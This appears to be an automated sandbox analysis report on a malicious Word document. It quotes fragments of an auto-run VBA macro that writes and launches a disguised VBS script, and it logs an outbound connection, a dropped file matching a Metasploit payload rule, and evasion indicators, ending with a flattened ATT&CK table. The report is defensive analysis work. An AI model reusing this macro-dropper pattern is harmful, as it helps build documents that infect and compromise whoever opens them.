Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 5UnAIdF7m2.docxOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\WindowServices.vbsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Sub Document_Open()
Source: 5UnAIdF7m2.docxOLE indicator, VBA macros: true
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\up[1].txt, type: DROPPEDMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engineClassification label: mal100.expl.evad.winDOCX@4/5@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$nAIdF7m2.docJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{40B2F04E-43D9-4C5A-BD72-4DC184598C61} - OProcSessId.datJump to behavior
Source: 5UnAIdF7m2.docxOLE indicator, Word Document stream: true
Source: 5UnAIdF7m2.docxOLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 5UnAIdF7m2.docxVirustotal: Detection: 50%
Source: 5UnAIdF7m2.docxReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

Data Obfuscation

barindex
Source: 5UnAIdF7m2.docxStream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: 5UnAIdF7m2.docxStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
Source: 5UnAIdF7m2.docxOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information331
Scripting
Valid Accounts23
Exploitation for Client Execution
331
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
